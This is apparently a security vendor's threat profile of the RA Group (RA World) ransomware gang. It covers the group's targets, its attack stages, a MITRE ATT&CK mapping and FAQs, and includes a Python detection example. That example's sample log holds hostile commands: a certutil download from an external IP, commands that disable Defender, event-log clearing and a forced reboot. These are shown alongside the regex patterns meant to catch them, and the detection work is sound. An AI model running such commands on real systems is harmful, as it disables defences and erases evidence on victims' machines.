RA Group

RA Group, also known as RA World, first surfaced in April 2023, utilizing a custom variant of the Babuk ransomware.

The Origin of RA Group

RA Group emerged in the early 2020s, gaining notoriety for targeting large corporations and government entities.  

The group's modus operandi involves exploiting vulnerabilities in network security to deploy ransomware, which encrypts the victim's data and demands a ransom, typically in cryptocurrency, for decryption keys.  

RA Group's operations are characterized by a dual-extortion tactic; they not only encrypt the victim's files but also threaten to release sensitive stolen data publicly if their ransom demands are not met. This tactic significantly increases the pressure on victims to comply with their demands.  

Over time, RA Group, now RA World, has refined its techniques, making it one of the more feared ransomware groups in the cybersecurity community.

Targets

RA Group's Targets

Countries targeted by RA Group

Many of RA Group’s targets were in the US, with a smaller number of attacks occurring in countries such as Germany, India, and Taiwan.

Source: Trend Micro

Industries Targeted by RA Group

The group mainly targets businesses in the healthcare and financial sectors.

Source: Trend Micro

RA Group's Victims

To date, more than 86 victims have fallen prey to RA Group’s malicious operations.

Source: ransomware.live

Attack Method

RA Group's Attack Method

Initial Access

RA Group gains entry into the victim's network by exploiting vulnerabilities in unpatched software, through exposed Remote Desktop Protocol (RDP) services, or via phishing emails.

Privilege Escalation

RA Group escalates privileges within the network to gain higher levels of access.

Defense Evasion

Credential Access

RA World obtains and leverages credentials to access various parts of the network.

Discovery

While moving across the network, RA World identifies the critical systems that are essential to the organization's operations.

Lateral Movement

Once access is gained, RA World uses compromised credentials and internal network tools to move laterally across the network.

Collection

Execution

The custom Babuk ransomware is deployed on the network, targeting essential files.

Exfiltration

Sensitive information such as financial records, personally identifiable information (PII), and intellectual property is exfiltrated from the network.

Impact

The ransomware encrypts crucial files, making them inaccessible to legitimate users.

MITRE ATT&CK Mapping

TTPs used by RA Group

TA0001: Initial Access
  (no techniques mapped)
TA0002: Execution
  (no techniques mapped)
TA0003: Persistence
  (no techniques mapped)
TA0004: Privilege Escalation
  T1484 Group Policy Modification
TA0005: Defense Evasion
  T1112 Modify Registry
  T1070 Indicator Removal
  T1562 Impair Defenses
  T1484 Group Policy Modification
TA0006: Credential Access
  (no techniques mapped)
TA0007: Discovery
  (no techniques mapped)
TA0008: Lateral Movement
  (no techniques mapped)
TA0009: Collection
  (no techniques mapped)
TA0011: Command and Control
  T1105 Ingress Tool Transfer
TA0010: Exfiltration
  (no techniques mapped)
TA0040: Impact
  T1529 System Shutdown/Reboot
  T1485 Data Destruction
  T1486 Data Encrypted for Impact
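The mapping above is a list of technique IDs; what a defender wants is to see them fire on telemetry. The following is an added example (not code from the original page or from any vendor) that tags constructed process-creation log lines with the technique IDs listed for RA Group and then flags hosts where several of them cluster, which is the pre-encryption staging pattern (tool download, defence tampering, log clearing, reboot) rather than one isolated command. The log format, host names, IP and the regex indicators are assumptions; the indicators are generic public ones for those techniques, not RA Group-specific IoCs.

```python
import re
from collections import defaultdict

# Regex -> ATT&CK technique, restricted to the IDs in the mapping above.
# Generic indicators for those techniques (assumption), not RA Group IoCs.
TECHNIQUE_RULES = [
    (r"\bwevtutil\b.*\bcl\b", "T1070", "Indicator Removal"),
    (r"\bSet-MpPreference\b.*-Disable\w+", "T1562", "Impair Defenses"),
    (r"\breg(\.exe)?\s+add\b", "T1112", "Modify Registry"),
    (r"\b(Set-GPRegistryValue|gpupdate\s+/force)\b", "T1484", "Group Policy Modification"),  # noisy alone
    (r"\b(certutil|bitsadmin|Invoke-WebRequest)\b.*https?://", "T1105", "Ingress Tool Transfer"),
    (r"\bshutdown(\.exe)?\s+/[rs]\b", "T1529", "System Shutdown/Reboot"),
]
# Constructed log format (assumption): "<ts> host=<h> user=<u> cmd=<command line>"
LOG_LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")
SAMPLE_LOG = """\
2024-05-01T09:12:03Z host=WS-17 user=jdoe cmd=notepad.exe C:\\Users\\jdoe\\notes.txt
2024-05-01T09:40:11Z host=SRV-FS1 user=svc_backup cmd=certutil.exe -urlcache -split -f http://198.51.100.7/tool.bin C:\\Temp\\tool.bin
2024-05-01T09:41:02Z host=SRV-FS1 user=svc_backup cmd=powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
2024-05-01T09:41:30Z host=SRV-FS1 user=svc_backup cmd=reg.exe add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2024-05-01T09:55:47Z host=SRV-FS1 user=svc_backup cmd=wevtutil.exe cl Security
2024-05-01T10:02:00Z host=SRV-FS1 user=svc_backup cmd=shutdown.exe /r /t 0
"""

def classify(cmd):
    """Technique IDs (with names) whose rule matches one command line."""
    return [(tid, name) for pat, tid, name in TECHNIQUE_RULES
            if re.search(pat, cmd, re.IGNORECASE)]

def scan(log_text):
    """Parse log lines and emit one hit per (line, technique) match."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the constructed format
        for tid, name in classify(m["cmd"]):
            hits.append({"ts": m["ts"], "host": m["host"], "user": m["user"],
                         "technique": tid, "name": name})
    return hits

def hosts_with_staging(hits, min_techniques=3):
    """Hosts with >= min_techniques distinct techniques: the chained pattern, not one stray command."""
    per_host = defaultdict(set)
    for h in hits:
        per_host[h["host"]].add(h["technique"])
    return {host: len(t) for host, t in per_host.items() if len(t) >= min_techniques}
```

Run against real Sysmon or Security 4688 events, the single-technique hits are tuning noise; the per-host clustering is what should page someone.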

FAQs

What is RA Group/RA World?

RA Group, also known as RA World, is a cybercriminal organization known for executing sophisticated ransomware attacks. They typically target large corporations and government entities.

How does RA Group gain access to networks?

RA Group gains initial access to its targets' networks by exploiting unpatched software, exposed Remote Desktop Protocol (RDP) services, and phishing scams.

What kind of ransomware does RA Group use?

RA Group is known for using custom-developed ransomware, including variants like Babuk, which encrypts files on infected systems and demands a ransom for decryption keys.

What is the typical ransom demanded by RA Group?

The ransom amount can vary greatly depending on the target and the perceived value of the encrypted data, often ranging from tens to hundreds of thousands of dollars, payable in cryptocurrency.

How does RA Group escalate their attack once inside a network?

After gaining initial access, RA Group typically uses compromised credentials and internal tools to escalate privileges and move laterally across the network to identify and compromise critical systems.

What are the dual-extortion tactics used by RA Group?

RA Group not only encrypts the victim's data but also steals sensitive information. They threaten to release this stolen data publicly if their ransom demands are not met.

How can organizations protect themselves against RA Group attacks?

Organizations should regularly update and patch systems, conduct phishing awareness training, secure RDP access, and use multifactor authentication. Implementing an AI-driven threat detection platform like Vectra AI can also help detect and respond to suspicious activities early.

What should an organization do if it falls victim to an RA Group attack?

Affected organizations should isolate infected systems, initiate their incident response and disaster recovery plans, and report the incident to law enforcement. Engaging with cybersecurity experts for forensic analysis and potential data recovery is also advisable.

Can data encrypted by RA Group be recovered without paying the ransom?

Data recovery without paying the ransom depends on the specific ransomware variant used and the availability of decryption tools. Backups are often the most reliable way to restore encrypted data.

What trends are we seeing with RA Group's activities?

RA Group has been increasingly targeting organizations with high-value data and critical infrastructure, often timing their attacks for maximum disruption. Their methods continue to evolve, incorporating more sophisticated techniques to evade detection and increase their success rate.